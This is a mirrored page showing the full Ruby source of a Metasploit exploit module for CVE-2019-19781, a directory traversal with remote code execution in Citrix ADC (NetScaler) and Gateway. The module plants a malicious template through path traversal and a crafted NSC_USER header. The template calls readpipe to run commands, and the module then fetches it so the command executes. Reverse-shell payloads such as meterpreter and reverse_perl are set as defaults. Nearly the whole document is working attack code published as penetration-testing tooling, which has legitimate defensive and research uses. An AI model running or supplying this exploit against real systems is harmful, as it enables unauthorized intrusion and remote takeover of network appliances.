Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb
33206 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = ExcellentRanking

9


10
  prepend Msf::Exploit::Remote::AutoCheck

11
  include Msf::Exploit::Remote::HttpClient

12
  include Msf::Exploit::Remote::CheckModule

13
  include Msf::Exploit::FileDropper

14
  include Msf::Module::Deprecated

15


16
  moved_from 'exploit/linux/http/citrix_dir_traversal_rce'

17


18
  def initialize(info = {})

19
    super(

20
      update_info(

21
        info,

22
        'Name' => 'Citrix ADC (NetScaler) Directory Traversal RCE',

23
        'Description' => %q{

24
          This module exploits a directory traversal in Citrix Application Delivery Controller (ADC), aka

25
          NetScaler, and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0, to execute an arbitrary command payload.

26
        },

27
        'Author' => [

28
          'Mikhail Klyuchnikov',          # Discovery

29
          'Project Zero India',           # PoC used by this module

30
          'TrustedSec',                   # PoC used by this module

31
          'James Brytan',                 # PoC contributed independently

32
          'James Smith',                  # PoC contributed independently

33
          'Marisa Mack',                  # PoC contributed independently

34
          'Rob Vinson',                   # PoC contributed independently

35
          'Sergey Pashevkin',             # PoC contributed independently

36
          'Steven Laura',                 # PoC contributed independently

37
          'mekhalleh (RAMELLA Sébastien)' # Module author (https://www.pirates.re/)

38
        ],

39
        'References' => [

40
          ['CVE', '2019-19781'],

41
          ['EDB', '47901'],

42
          ['EDB', '47902'],

43
          ['URL', 'http://web.archive.org/web/20220608001448/https://support.citrix.com/article/CTX267027'],

44
          ['URL', 'http://web.archive.org/web/20200707202522/https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/'],

45
          ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']

46
        ],

47
        'DisclosureDate' => '2019-12-17',

48
        'License' => MSF_LICENSE,

49
        'Privileged' => false,

50
        'Targets' => [

51
          [

52
            'Python',

53
            {

54
              'Platform' => 'python',

55
              'Arch' => ARCH_PYTHON,

56
              'Type' => :python,

57
              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }

58
            }

59
          ],

60
          [

61
            'Unix Command',

62
            {

63
              'Platform' => 'unix',

64
              'Arch' => ARCH_CMD,

65
              'Type' => :unix_cmd,

66
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }

67
            }

68
          ]

69
        ],

70
        'DefaultTarget' => 0,

71
        'DefaultOptions' => {

72
          'CheckModule' => 'auxiliary/scanner/http/citrix_dir_traversal',

73
          'HttpClientTimeout' => 3.5

74
        },

75
        'Notes' => {

76
          'AKA' => ['Shitrix'],

77
          'Stability' => [CRASH_SAFE],

78
          'Reliability' => [REPEATABLE_SESSION],

79
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]

80
        }

81
      )

82
    )

83


84
    register_options([

85
      OptString.new('TARGETURI', [true, 'Base path', '/'])

86
    ])

87
  end

88


89
  def cmd_unix_generic?

90
    datastore['PAYLOAD'] == 'cmd/unix/generic'

91
  end

92


93
  def exploit

94
    print_status("Yeeting #{datastore['PAYLOAD']} payload at #{peer}")

95
    vprint_status("Generated payload: #{payload.encoded}")

96


97
    case target['Type']

98
    when :python

99
      execute_command(%(/var/python/bin/python2 -c "#{payload.encoded}"))

100
    when :unix_cmd

101
      if (res = execute_command(payload.encoded)) && cmd_unix_generic?

102
        print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))

103
      end

104
    end

105
  end

106


107
  def execute_command(cmd, _opts = {})

108
    filename = rand_text_alpha(8..42)

109
    nonce = rand_text_alpha(8..42)

110


111
    res = send_request_cgi(

112
      'method' => 'POST',

113
      'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),

114
      'headers' => {

115
        'NSC_USER' => "../../../netscaler/portal/templates/#{filename}",

116
        'NSC_NONCE' => nonce

117
      },

118
      'vars_post' => {

119
        'url' => rand_text_alpha(8..42),

120
        'title' => "[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]"

121
      }

122
    )

123


124
    unless res && res.code == 200

125
      print_error('No response to POST newbm.pl request')

126
      return

127
    end

128


129
    res = send_request_cgi(

130
      'method' => 'GET',

131
      'uri' => normalize_uri(target_uri.path, "/vpn/../vpns/portal/#{filename}.xml"),

132
      'headers' => {

133
        'NSC_USER' => rand_text_alpha(8..42),

134
        'NSC_NONCE' => nonce

135
      },

136
      'partial' => true

137
    )

138


139
    unless res && res.code == 200

140
      print_warning("No response to GET #{filename}.xml request")

141
    end

142


143
    register_files_for_cleanup(

144
      "/netscaler/portal/templates/#{filename}.xml",

145
      "/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2"

146
    )

147


148
    res

149
  end

150


151
  def chr_payload(cmd)

152
    cmd.each_char.map { |c| "chr(#{c.ord})" }.join('.')

153
  end

154


155
end

156


157